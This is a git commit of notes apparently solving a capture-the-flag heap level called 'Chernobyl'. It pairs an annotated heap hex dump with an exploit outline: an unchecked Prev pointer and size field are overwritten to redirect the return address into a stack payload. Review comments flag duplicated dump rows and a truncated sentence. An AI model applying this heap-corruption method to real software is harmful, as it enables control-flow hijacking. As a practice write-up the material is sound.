Solve Chernobyl

This commit is contained in:
Val
2022-09-02 06:24:41 -05:00
parent 31df36d848
commit f63718bc9b
3 changed files with 75 additions and 17 deletions


@@ -1,23 +1,23 @@
Hash Table, plus one full box:
5000: 0050 1050 1500 0b00 0300 0500 1650 2c50 .P.P.........P,P
5010: 0050 2650 2100 4250 a250 0251 6251 c251 .P&P!.BP.P.QbQ.Q
5020: 2252 8252 e252 1050 3c50 2100 0b00 0000 "R.R.R.P<P!.....
5030: 0000 0000 0000 0000 0000 0000 2650 9c50 ............&P.P
5040: b500 4141 4141 4141 4141 4141 4141 4141 ..AAAAAAAAAAAAAA
0 1 2 3 4 5 6 7 8 9 a b c d e f
5000:[0050 1050 1500]0b00 0300 0500 1650 2c50 .P.P.........P,P
5010:[0050 2650 2100]4250 a250 0251 6251 c251 .P&P!.BP.P.QbQ.Q
5020: 2252 8252 e252[1050 3c50 2100]0b00 0000 "R.R.R.P<P!.....
5030: 0000 0000 0000 0000 0000 0000[2650 9c50 ............&P.P
5040: b500]4141 4141 4141 4141 4141 4141 4141 ..AAAAAAAAAAAAAA
5050: 4100 e004 4141 4141 4141 4141 4141 4141 A...AAAAAAAAAAAA
5060: 4141 4100 e004 4141 4141 4141 4141 4141 AAA...AAAAAAAAAA
5070: 4141 4141 4100 e004 4141 4141 4141 4141 AAAAA...AAAAAAAA
5080: 4141 4141 4141 4100 e004 4141 4141 4141 AAAAAAA...AAAAAA
5090: 4141 4141 4141 4141 4100 e004 4141 4141 AAAAAAAAA...AAAA ; wait a second
50a0: 4141 4141 4141 4141 4141 4100 e004 4141 AAAAAAAAAAA...AA
5090: 4141 4141 4141 4141 4100 e004[4141 4141 AAAAAAAAA...AAAA ; wait a second
50a0: 4141]4141 4141 4141 4141 4100 e004 4141 AAAAAAAAAAA...AA
50b0: 4141 4141 4141 4141 4141 4141 4100 e004 AAAAAAAAAAAAA...
50c0: 4141 4141 4141 4141 4141 4141 4141 4100 AAAAAAAAAAAAAAA.
50d0: e004 4141 4141 4141 4141 4141 4141 4141 ..AAAAAAAAAAAAAA
50e0: 4100 e004 4141 4141 4141 4141 4141 4141 A...AAAAAAAAAAAA
50f0: 4141 4100 e004 4141 4141 4800 9c50 5c51 AAA...AAAAH..P\Q
5100: b500 0000 0000 e004 0000 0000 0000 0000 ................
50f0: 4141 4100 e004 4141 4141 4800[9c50 5c51 AAA...AAAAH..P\Q
5100: b500]0000 0000 e004 0000 0000 0000 0000 ................
Heap metadata @ 2400: 0050 0080 0000
Heap start: 0x5000
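Review bot: the rows 5090/50a0 and 50f0/5100 are listed twice in this hunk (first plain, then again with a six-byte header bracketed), and the first five rows under "Hash Table, plus one full box:" are repeated immediately below the "0 1 2 ... f" column header, so the reader cannot tell which copy of the dump is the current one; keep a single annotated copy, or label the first as the raw dump and the second as the bracketed parse. The "; wait a second" remark on the 5090 row also needs a sentence saying what was noticed: the bracket there surrounds `[4141 4141 4141]` where every other bracketed header holds prev/next/size values, which is the point the comment is gesturing at but never states.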
@@ -51,10 +51,15 @@ Section header metadata @ 5026: 1050 3c50 2100
[ Prev: 5010, Next: 503c, Size: 0010 ]
Data: 0a00 0000 0000 0000 0000 0000 0000 0000
The Exploit:
When an 11th user is added, the software will attempt to double the size of the heap. Overwriting a heap Next pointer allows us toAAAA
for c in ['1', '9', 'A', 'I', 'Q', '0', '8', '@', 'H', 'P', 'AAAAAAAAAAAAAAAA', '']:
print(f'new {c} ;',end="")
Malloc:
- Checks to make sure next pointer is always ASCENDING
- Does not check prev pointer!!!!
The Exploit:
- Overwrite the prev pointer of a block so that it points to ~ the return address on stack
- Overwrite the size parameter so that, when added to the return address, it places pc somewhere nice
- Place pc into a payload on the stack
- INT 0x7f
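Review bot: the sentence "Overwriting a heap Next pointer allows us toAAAA" is cut off with stray "AAAA" fused onto it, and the two-line Python snippet under it runs straight into the prose with no blank line or fence; finish or drop the sentence and set the snippet apart (`print(f'new {c} ;',end="")` also wants a space after the comma). "The Exploit:" appears as a heading twice in this hunk, so the two lists should be merged under one. The "Malloc:" list is the substantive finding here, that Next is checked to be ascending while Prev is never validated, and it is worth one line stating the corresponding fix: validate the Prev pointer with the same ordering and bounds check applied to Next, since that missing check is what the rest of the hunk depends on.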